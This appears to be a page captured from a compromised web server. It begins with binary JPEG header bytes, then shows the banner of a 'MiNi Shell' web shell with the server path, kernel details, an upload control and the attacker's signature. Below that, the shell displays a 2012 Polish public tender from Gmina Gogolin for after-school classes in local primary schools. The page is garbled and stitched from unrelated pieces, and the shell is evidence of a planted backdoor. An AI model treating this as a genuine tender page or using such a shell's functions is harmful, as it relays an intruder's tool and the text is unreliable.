JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120419/123976-N-2012.html

<p class="kh_header"><b>Gogolin: Zamówienie: na prowadzącego zajęcia pozalekcyjne, w ramach projektu POKL.09.01.02-16-086/11 pod nazwą: Razem możemy - indywidualizacja nauczania w Gminie Gogolin, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 123976 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gogolin , ul. Krapkowicka 6, 47-320 Gogolin, woj. opolskie, tel. 77 4076800, faks 77 4666247.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie: na prowadzącego zajęcia pozalekcyjne, w ramach projektu POKL.09.01.02-16-086/11 pod nazwą: Razem możemy - indywidualizacja nauczania w Gminie Gogolin, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.	Przedmiot zamówienia 

4.1 Przedmiotem zamówienia jest usługa polegająca na prowadzeniu zajęć pozalekcyjnych (dydaktyczno-wyrównawczych oraz opieki psychologicznej w czterech szkołach PSP dla klas I - III w ramach projektu pod nazwą: Razem możemy - indywidualizacja nauczania w Gminie Gogolin, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Celem głównym jest wsparcie w okresie realizacji projektu indywidualizacji rozwoju uczniów klas I-III szkół podstawowych Gminy Gogolin, dostosowanie do zdiagnozowanych potrzeb edukacyjnych uczniów oraz możliwości psychofizycznych. wyrównywanie szans edukacyjnych uczniów, poprzez indywidualizację procesu dydaktyczno-wychowawczego w klasach I-III. Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb uczniów. Prowadzenie zajęć z zaburzeniami umiejętności szkolnych poprzez poprawę umiejętności czytania oraz poprawę umiejętności zastosowania działań matematycznych przez uczestników. Zajęcia logopedyczne prowadzone dla dzieci z zaburzeniami rozwoju mowy poprzez usprawnienie wymowy. Prowadzenie gimnastyki korekcyjnej mającej na celu usprawnienie motoryki uczestników, a także zajęcia dla uczniów uzdolnionych poprzez rozwój uzdolnień i wzrost wiedzy z zakresu prowadzonych zajęć. Poznanie 7 technik plastycznych. A także prowadzenie zajęć socjoterapeutycznych i psychoedukacyjnych oraz terapeutyczno - integracyjnych dla dzieci z zaburzeniami komunikacji społecznej, które mają na celu wzrost samooceny uczestników  oraz poprawę zachowań społecznych, usuwanie przyczyn problemów w nauce. Wzmocnienie motywacji do nauki.

4.2 Obowiązki prowadzącego zajęcia pozalekcyjne 
a)	prowadzenie zajęć pozalekcyjnych (podział godzin w zależności od części), w terminie maksymalnym do 29 czerwiec 2012. Każdy uczeń w projekcie powinien być objęty minimum 30godzinami zajęć. Grupy powinny być utworzone zgodnie z projektem. 
b)	dokumentowanie zajęć pozalekcyjnych (dokumentacja fotograficzna, programy prowadzonych zajęć, prace uczestników, karty czasu pracy, dzienniki zajęć, listy obecności, ankiety, wywiady z nauczycielami, testy, diagnoza)
c)	pomoc dyrektorowi szkoły w której prowadzone są zajęcia w przygotowywaniu sprawozdań miesięcznych z realizacji zajęć  poprzez sporządzanie sprawozdań.
d)	szczegółowe obowiązki ujęte zostały w zakresie obowiązków, stanowiącym załączniki  do SIWZ, które będą stanowić załączniki do umowy.
Poniżej podział postępowania na części w zależności od miejsca wykonywania usługi (adres szkoły) oraz rodzaju zajęć pozalekcyjnych: 

Części od 1-9 	miejsce wykonywania usługi - PUBLICZNA SZKOŁA PODSTAWOWA NR 2 im. KORNELA MAKUSZYŃSKIEGO w GOGOLINIE ul Strzelecka 39, 47-320 Gogolin

Część 1	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - 105 godzin dla 24 uczniów ( 11chłopców i 13 dziewcząt)
Część 2	 Zajęcia logopedyczne - 70 godzin dla 11 uczniów (8 chłopców i 3 dziewczęta) 
Część 3	 Gimnastyka korekcyjna - 70  godzin dla 16 uczniów (8 chłopców i  8 dziewcząt)
Część 4	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. Ia - 35 godzin dla 6 uczniów ( 3 chłopców i 3 dziewcząt)
Część 5	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. Ib - 35 godzin dla  7 uczniów (3 chłopców i  4 dziewcząt)
Część 6	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. IIa- 35 godzin dla 4uczniów (2chłopców i 2  dziewcząt)
Część 7	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. IIb- 35 godzin dla 6 uczniów (3 chłopców i 3 dziewcząt)
Część 8	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. IIIa- 35 godzin dla 6 uczniów (2 chłopców i 4 dziewcząt)
Część 9	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z uwzględnieniem nauk matematyczno - przyrodniczych w kl. IIIb - 35 godzin dla 6 uczniów (4 chłopców i 2 dziewcząt)
(razem w cz. 4- 9 powinno być 35 uczniów 17chłopców i 18 dziewcząt)
	
		
Części od 10-21	miejsce wykonywania usługi - PUBLICZNA SZKOŁA PODSTAWOWA NR. 3 im. JANA BRZECHWY z ODDZIAŁAMI PRZEDSZKOLNYMI oraz FILIĄ w ZAKRZOWIE ul. Krapkowicka 141 47-320 Gogolin
Część 10	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu kl. I- II, 30 godzin dla 7 uczniów (5 chłopców i 2 dziewcząt)
Część 11	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu kl. IIIa i IIIb, 30 godzin dla  5 uczniów (4 chłopców i 1 dziewcząt)
Część 12	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu kl. II i III Zakrzów, 30 godzin dla 3 uczniów (3chłopców i 0 dziewcząt)
(razem w cz. 10-12 musi być 15uczniów 12chłopców 3dziewczyny)

Część 13	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematyczne kl. I i II, 30 godzin  dla 7 uczniów (4 chłopców i 3 dziewcząt)
Część 14	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematyczne kl. IIIa i IIIb, 30 godzin dla 5 uczniów (4 chłopców i 1 dziewcząt)
Część 15 	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematyczne kl. II i III Zakrzów, 30 godzin dla 3 uczniów (3chłopców i 0 dziewcząt)
(razem w cz. 13-15 musi być 15uczniów 11chłopców i 4dziewczęta)

Część 16	Zajęcia logopedyczne - 35 godzin dla 12uczniów (10chłopców i 2dziewcząt)
Część 17       Zajęcia psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej - 30 godzin dla 5uczniów (5chłopców 0dziewcząt)
Część 18	Gimnastyka korekcyjna - 90 godzin dla 20 uczniów (10chłopców i 10dziewcząt)
Część 19	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych edukacja nauk przyrodniczo -plastycznych kl. I i II, 30 godzin  dla 12 uczniów (1 chłopca i 11 dziewcząt)
Część 20	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych edukacja  nauk przyrodniczo - plastycznych kl. IIIa i IIIb, 30 godzin  dla 6 uczniów (0 chłopców i 6 dziewcząt)
Część 21	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych edukacja  nauk przyrodniczo -plastycznych kl. II i III Zakrzów, 30 godzin  dla 3uczniów (0 chłopców i 3 dziewcząt)
 (razem w cz. 19-21 musi być 21 uczniów 1chłopiec i 20dziewcząt)  


Części od 22-27	miejsce wykonywania usługi - PUBLICZNA SZKOŁA PODSTAWOWA im. MIKOŁAJA KOPERNIKA w MALNI, z ODDZIAŁAMI PRZEDSZKOLNYMI Malnia, ul. Podgórna 3 47-316 Górażdże

Część 22	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - 32godziny dla 9 uczniów (3chłopców i 6dziewcząt) 
Część 23	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematyczne - 32godziny dla 10uczniów (4chłopców i 6dziewcząt) 
Część 24 	Zajęcia logopedyczne - 32 godziny dla 11uczniów (6chłopców i 5dziewcząt) 
Część 25	Gimnastyka korekcyjna - 40godzin dla 10uczniów (3chłopców i 7dziewcząt) 
Część 26	Specjalistyczne zajęcia terapeutyczne - 60 godzin dla 39uczniów (16chłoców i 23dziewcząt)
Część 27   Zajęcia rozwijające zainteresowania plastyczne - 32godziny dla 10uczniów (3chłopców i 7dziewcząt)

Części od 28-33	miejsce wykonywania usługi - PUBLICZNA SZKOŁA PODSTAWOWA im. POWSTAŃCÓW ŚLĄSKICH  w KAMIENIU ŚL. ul. Klasztorna 2, 47-325 Kamień Śląski
Część 28	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - 30 godzin dla 6 uczniów (3chłopców i 3dziewcząt)
Część 29	Zajęcia dla dzieci z  trudnościami w zdobywaniu umiejętności matematyczne - 30 godzin dla 6 uczniów (4chłopców i 2dziewcząt)
Część 30         Zajęcia logopedyczne - 30 godzin dla 8uczniów (4chłopców i 4dziewcząt)
Część 31	Gimnastyka korekcyjna - 30 godzin dla 13uczniów (6chłopców i 7dziewcząt)
Część 32	Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych matematyczno-przyrodniczo - 30 godzin dla 8uczniów (5chłopców i 3dziewcząt)
Część 33	Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych humanistycznie - 30 godziny dla 6 uczniów (2chłopców i 4dziewcząt)


4.3 Nazwa i kod Wspólnego Słownika Zamówień (CPV):
usługi edukacyjne i szkoleniowe (CPV: 80000000-4)
usługi szkolnictwa podstawowego (CPV: 80100000-5),
różne usługi szkolne (CPV80410000-1)
usługi psychiatryczne lub psychologiczne (CPV 85121270-6) 

4.4	 Dopuszcza się składnie ofert częściowych: 33 części.
4.5 Zamówienie realizowane jest na potrzeby Projektu Razem możemy - indywidualizacja nauczania w Gminie Gogolin, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
4.6 Wartość zamówienia została ustalona na kwotę brutto (brutto) - całość zamówienia wynosi 64 400,00 zl Poniżej przedstawiono podział nr części, ilość godzin x stawka godzinowa = kwota zł brutto brutto:


część 1	   105	           x       50,00	      =          5250,00 zł
część 2	    70	           x      50,00	      =         3500,00 zł
część 3	    70	           x      50,00	      =         3500,00 zł
część 4	    35	           x      50,00	      =         1750,00 zł
część 5	    35	           x      50,00	      =         1750,00 zł
część 6	    35	           x     50,00	      =          1750,00 zł
część 7	    35	           x      50,00	      =          1750,00 zł
część 8	    35	           x      50,00	      =        1750,00 zł
część 9	    35	           x      50,00	      =           1750,00 zł
część 10	    30	           x      50,00	      =         1500,00 zł
część 11	    30	           x      50,00	      =         1500,00 zł
część 12	    30	           x      50,00	      =         1500,00 zł
część 13	    30	           x      50,00	      =         1500,00 zł
część 14	    30	           x      50,00	      =         1500,00 zł
część 15	    30	           x      50,00	      =         1500,00 zł
część 16	    35	           x      50,00	      =         1750,00 zł
część 17	    30	           x       50,00	      =         1500,00 zł
część 18	    90	           x      50,00	      =         4500,00 zł
część 19	    30	           x      50,00	      =         1500,00 zł
część 20	    30	           x      50,00	      =         1500,00 zł
część 21	    30	           x      50,00	      =         1500,00 zł
część 22	    32	           x      50,00	      =         1600,00 zł
część 23	    32	           x      50,00	      =         1600,00 zł
część 24	    32	           x      50,00	      =         1600,00 zł
część 25	    40	           x       50,00	      =         2000,00 zł
część 26	    60	           x      50,00	      =         3000,00 zł
część 27	    32	           x      50,00	      =         1600,00 zł
część 28	    30	           x      50,00	      =         1500,00 zł
część 29	    30	           x      50,00	      =         1500,00 zł
część 30	    30	           x      50,00	      =         1500,00 zł
część 31	    30	           x      50,00	      =         1500,00 zł
część 32	    30	           x      50,00	      =         1500,00 zł
część 33	    30	           x      50,00	      =         1500,00 zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1, 82.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 33.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje osobami zdolnymi do realizacji zamówienia, a w szczególności: 
- do części 17 osobą posiadającą wykształcenie wyższe magisterskie na kierunku psychologia.
- do części 26 osobę posiadającą wykształcenie wyższe magisterskie na kierunku psychologia lub terapię pedagogiczna
- do pozostałych części: osobą posiadającą odpowiednie wykształcenie wyższe z przygotowaniem pedagogicznym do prowadzenia zajęć objętych zamówieniem</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy - załącznik nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem ust.2.

2.  Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków:

1)	zmiana okresu realizacji umowy, o którym mowa w § 6 ust.1 umowy, jest możliwa wyłącznie za zgodą obu stron umowy;

2)	zmniejszenie wartości umowy, o której mowa w § 3 ust. 1 umowy, jest możliwe wyłącznie za zgodą obu stron umowy;

3)	w przypadku wystąpienia siły wyższej ) możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;

4)	w przypadku zaistnienia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;

5)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy. 

3. Zmiany umowy, o których mowa w ust. 2 umowy, nie mogą powodować zwiększenia wartości umowy, o której mowa w § 3 ust. 1umowy.

4. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku takiego odstąpienia, nie stosuje się kar określonych w § 10 ust. 2 niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gogolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gogolinie, 470-320 Gogolin ul. Krapkowicka 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 10:00, miejsce: Urząd Miejski w Gogolinie, 470-320 Gogolin ul. Krapkowicka 6
pokój nr 14 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu POKL.09.01.02-16-086/11 pod nazwą: Razem możemy - indywidualizacja nauczania w Gminie Gogolin, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com